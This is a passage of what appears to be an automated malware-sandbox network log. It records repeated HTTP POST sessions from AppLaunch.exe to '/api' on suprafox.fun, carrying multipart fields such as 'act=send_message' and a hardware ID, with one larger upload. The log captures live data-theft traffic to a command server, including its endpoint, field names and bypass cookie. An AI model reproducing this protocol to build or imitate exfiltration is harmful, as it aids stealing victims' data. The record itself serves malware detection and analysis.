Oct 24, 2023 00:06:16.294651985 CEST	102	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:16.295645952 CEST	102	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:16.752566099 CEST	129	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=jaf1k5qogkd9u9mqkahk54cbb8; expires=Fri, 16 Feb 2024 15:52:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t0ug33fchazDixS0DGn%2BAdrTAK6VmJagKnSRv4pR6JGl4Ix1wnthFkzDUI9PBYd9z%2BHD%2Fkt0VkHhC1no2TkFWSyzF9ZAVDWpB%2BV604aFH75GjrY2NfRoH48EusMU68E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad494809c93b96-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:16.752584934 CEST	130	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49740	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:05.363164902 CEST	29	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:05.363903046 CEST	29	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:05.774220943 CEST	31	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=m0a76nudihpb8rudgurajrru04; expires=Fri, 16 Feb 2024 15:52:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MvnoVp01zmS9RJ5VhU%2BAHgc7tI1FryoaFQSORb8bPWKr0DGlqpKT2JvGhfgxmsnIbJS%2Bid5%2F4BOfuJFkn42dKydcNIVBk6Gw3NooUZRJoKss76o7GI1f6MsaBTNvoBQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4903bf1d28ba-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:05.774244070 CEST	31	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49759	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:16.895720959 CEST	130	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:16.896447897 CEST	131	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:17.363092899 CEST	132	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ltnsiqmt079m6rm29gifavq7aa; expires=Fri, 16 Feb 2024 15:52:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3xDxdmr7gRPrIyVawjMhW7eVfklDbKmZhWOkiAjeJFKK%2BJZaLry0uSiG3fr0bBcI4qxDSWajehHybW7j9ZVZ076McsrS2g6wetMarfLJIQAae3%2B7C6ZXPkJQQzmaF7c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad494bd9492d13-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:17.363121033 CEST	132	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49760	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:17.511248112 CEST	133	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:17.511970043 CEST	134	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:17.983056068 CEST	135	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=08q2mcl56orlns0c5snfsmrogk; expires=Fri, 16 Feb 2024 15:52:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MEUUxQk4lBBYGI%2FD%2BYBMZa%2BTJBJ0gEG7LiUyCI%2FOpphno6GsrhsWUclYNOI9p9hw%2BXnD4BV1QK0WiTKAQdqlIzBRoB4He8tsS%2BcUuKChiTGXU0sc9DJcn1xbhwNB%2Fs8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad494faa1d8269-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:17.983086109 CEST	135	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49761	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:18.126688004 CEST	136	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:18.127418041 CEST	136	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:18.615617037 CEST	138	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=d8apb99sbr629on8ni9ag3egvn; expires=Fri, 16 Feb 2024 15:52:57 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:18 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ckwoiygUlq2P6wD5NccZ9BwtG6ub210plWXvRBghWHwGyN0%2F5wozGoYiHf8OXLxgXhnVMMnkPY12JfqROhOFxSD6RjNt0KTKf8uxUUg24H7kqn3TSNXrPdwYviAbjWA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad495389f368f0-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:18.615706921 CEST	138	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49762	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:19.201195002 CEST	139	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 11760 Host: suprafox.fun
Oct 24, 2023 00:06:19.202380896 CEST	150	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:19.582931995 CEST	152	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=140v33jrl5bt99o706s6hfqg8m; expires=Fri, 16 Feb 2024 15:52:58 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:19 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4oKJmr38dTCnC%2BKLEvtsaQWFzWi3%2FY1HuBFAnilzAVlYLbOwU5xuM562qyC%2FytA1u6AZW0L5O82x35B91cOLMbZ8i3gB%2BLn47jxqS3iia3tkynUhxxg%2BxyE6Y3g2dGY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad495a3f16200f-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:19.582956076 CEST	152	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49763	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:19.770816088 CEST	153	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:19.771917105 CEST	153	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:20.248287916 CEST	154	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=9aq8fn3dgqfoag5c5db797rnfu; expires=Fri, 16 Feb 2024 15:52:59 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=blUGn%2BXg5bsU0m42JOM81V0WD0Z8jhXoBa2qIr7ht7m%2B0csPn%2FhIcXKGyyKmO2HKvS6c7AANp2Vj1mZoZqJ2%2BZrCvCAA15iGBCXt%2FKxmP1l08HvBqKQusVWiF8VSE%2B8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad495dc8d007bc-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:20.248308897 CEST	154	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.4	49764	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:20.417365074 CEST	155	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:20.418488026 CEST	156	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:20.759413004 CEST	157	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=m242q2k9f4hu6lq5pmcjh3pf81; expires=Fri, 16 Feb 2024 15:52:59 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:20 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=huweaYHgqFhuopXnsDHicIUUs1Nzxhdw3Av7u0GR%2BoHfU%2B1qw9ky8ufrLfq6AnYzELR0yZFWJUuOHnsWb66sk9UTmZw9%2FGM80ERRkWsurroAd6YuUTRXlGHKVTIShhU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4961d8f50658-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:20.759529114 CEST	157	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.4	49765	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:20.915882111 CEST	158	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:20.917018890 CEST	159	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:21.387351990 CEST	160	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=cniqouaovd09nr8i02kjvm8n4d; expires=Fri, 16 Feb 2024 15:53:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ku8QgppMXeV1K5ltlFE0ArzTK9nbW9oxQmwLZELM38rp7JYiwLpFh8lfpgcFYG0J%2Bz9tvmYzPwXV%2B0N7E%2B5inSP55d7V8lIb37LA9lwcp8iDVsiDTFt6lMYbmwOFU5c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad4964ebe42063-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:21.387389898 CEST	160	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.4	49766	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:21.545959949 CEST	161	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:21.547091961 CEST	161	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:22.013473034 CEST	163	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=irjk3e358nclnvopc2rt62fbg4; expires=Fri, 16 Feb 2024 15:53:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: 